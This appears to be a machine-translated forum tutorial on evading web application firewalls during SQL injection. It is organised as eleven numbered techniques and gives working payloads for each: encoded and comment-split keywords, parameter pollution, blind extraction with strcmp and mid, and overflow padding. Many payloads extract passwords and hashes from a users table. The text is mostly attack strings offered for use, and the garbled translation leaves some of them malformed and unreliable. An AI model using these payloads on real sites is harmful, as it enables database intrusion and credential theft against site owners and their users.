WAF bypass Technology in SQL Injection

Forum: French Forum directory 1. case-insensitive bypass 2. simple code bypass 3. annotation bypass 4. separated rewrite bypass 5. http parameter pollution (HPP) 6. use the logical operator or/and to bypass 7. comparison operator replacement 8. replace functions with functions 9. no need for blind injection or and 10. brackets 11. buffer overflow bypass 1. everyone is familiar with case-insensitive bypass. For some too-junk WAF, the effect is significant. For example, if union is intercepted, then Union UnIoN is used. 2. Simple encoding bypasses keywords such as WAF detection, so we can make it impossible to detect it. For example, if union is detected, we use % 55, that is, the hexadecimal encoding of U, instead of U. union is written as % 55 nION, and some WAF can be bypassed in combination with case, you can replace one or more of them at will. In addition, during Mysql injection, for example, when the table name or load file is used, the file name or representation is used to bypass WAF in hexadecimal encoding. 3. Note bypass is rare. WAF only filters a dangerous statement and does not block our entire query. 01 ./? Id = 1 + union + select + 1, 2, 3/* For example, for the preceding query, WAF filters the union and select statements, so we are writing a comment statement before, let him filter out the comment without affecting our query. So the bypass statement is: 01 ./? Id = 1/* union */union/* select */select + 1, 2, 3/* There is also a bypass related to annotation: for example: 01. index. php? Page_id =-15 /*! UNION *//*! SELECT */1, 2, 3, 4... As you can see, as long as we put the sensitive word in the comment, note that we need to add one before! 4. The preceding example applies to scenarios where WAF uses regular expressions and detects all sensitive words, regardless of where you write them. If you have a few words, filter them. We can separate sensitive words through annotations, so that the WAF regular expression does not work, but the query results are not affected. 01 ./? Id = 1 + un/**/ion + sel/**/ect + 1, 2, and 3 -- As for rewrite bypass, this is suitable for scenarios where WAF filters once, like the principle of uploading aaspsp horse, we can write something like Ununionion. After filtering a union operation, our query will be executed. 01 .? Id = 1 ununionion select 1, 2, 3 -- 5. Http parameter contamination (HPP). For example, we have the following statement: 01 ./? Id = 1 union select + 1, 2, 3 + from + users + where + id = 1 -- we can repeat the previous id value to add our value to bypass, & amp; id = will be changed to comma: 01 during query. /? Id = 1 union select + 1 & id = 2, 3 + from + users + where + id = 1 -- in this case, there are many conditions for success, depending on the specific WAF implementation. Another example is provided to illustrate the usage: 01 ./? Id = 1/**/union/* & id = */select/* & id = */pwd/* & id = */from/* & id = */users -- The specific analysis involves compiling the background code of the query statement. For example, the server writes: 01. select * from table where a = ". $ _ GET ['a']. "and B = ". $ _ GET ['B']. "limit ". $ _ GET ['C']; then we can construct such an injection statement: 01. /? A = 1 + union/* & B = */select + 1, pass/* & c = */from + users -- the final resolution is: 01. select * from table where a = 1 union/* and B = */select 1, pass/* limit */from users -- we can see that this method is more suitable for white box testing, black box penetration is troublesome to use. But you can try it. 6. Use the logical operator or/and to bypass 01 ./? Id = 1 + OR + 0x50 = 0x50 02 ./? Id = 1 + and + ascii (lower (mid (select + pwd + from + users + limit +),) = 74 By The Way, explain the second sentence, starting from the brackets in the beginning, select + pwd + from + users + limit + queries the first record of the pwd field from the users table, such as admin, then mid (previous sentence), is to take the first character of admin, that is, a, lower (previous sentence) is to convert the character to lowercase, then, ascii is to convert a to an ascii code, and the wait value is not 74. Www.2cto.com 7. comparison operator replacement includes! = Not equal to, <> not equal to, <less than,> greater than, can be used to replace = to bypass. For example, in the previous example, to determine whether it is 74, if it is = filtered, we can determine whether it is greater than 73, whether it is less than 75, and then we will know that it is 74 .. Many WAF will forget this. 8. Replace Substring () with the same function can be replaced with mid () and substr (), which are used to take a certain character of the string. Ascii () encoding can be replaced by hex (), bin (), that is, hexadecimal and binary encoding. Benchmark () can be replaced by sleep (). The two are used in latency-based blind injection and will be introduced to you. If the connection is blocked, there is a new method: 01. www.2cto.com substring (select 'Password'), 1, 1) = 0x70 02. substr (select 'Password'), 1, 1) = 0x70 03.mid( (select 'Password'), 1, 1) = 0x70 for example, the value of the first character is determined from the password. You can use: 01. strcmp (left ('Password', 1), 0x69) = 1 02. strcmp (left ('Password', 1), 0x70) = 0 03. strcmp (left ('Password', 1), 0x71) =-1 to replace, left is used to take the value of 1 from the left of the string, and strcmp is used to compare two values, if the comparison result is equal, it is 0. If the value is small on the left, it is-1. Otherwise, it is 1. The group_concat and concat and concat_ws mentioned in the previous articles can also be replaced with each other. 9. There is no need for blind injection or, and for example, there is such an injection point: 01. index. php? Uid = 123 and, or is filtered out. In fact, there is a more direct method. We can directly change 123 to the one generated by our statement: 01. index. php? Uid = strcmp (left (select + hash + from + users + limit + 123), 1), 0x42) + 123 when the page is correct, we are currently blindly guessing the first part of hash. If the first part is 0x42 or B, then the strcmp result is 0, 0 + 123 = 123, so the page should be correct. Otherwise, it means that it is not B. In this way, you can guess that and or are not used. 10. Brackets 01 ./? Id = 1 + union + (select + 1, 2 + from + users) For example, the above line is intercepted by WAF. Try to add some parentheses: 01 ./? Id = 1 + union + (select + 1, 2 + from + xxx) 02 ./? Id = (1) union (select (1), mid (hash, 1, 32) from (users) 03 ./? Id = 1 + union + (select '1', concat (login, hash) from + users) 04 ./? Id = (1) union (select (1), hex (hash) from (users) 05 ./? Id = (1) or (0x50 = 0x50) 11. buffer overflow bypass this is seen from a foreign blog: 01.id= 1 and (select 1) = (Select 0 xaaaaaaaaaaaaaaaaaaa) + UnIoN + SeLeCT + 1, 2, version (), 4, 5, database (), user (), 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26 02 ., 27,28, 29,30, 31,32, 33,34, 35,36-+ where 0xaaaaaaaaaaaaaaaaaaa the more A, the better, generally more than 1000.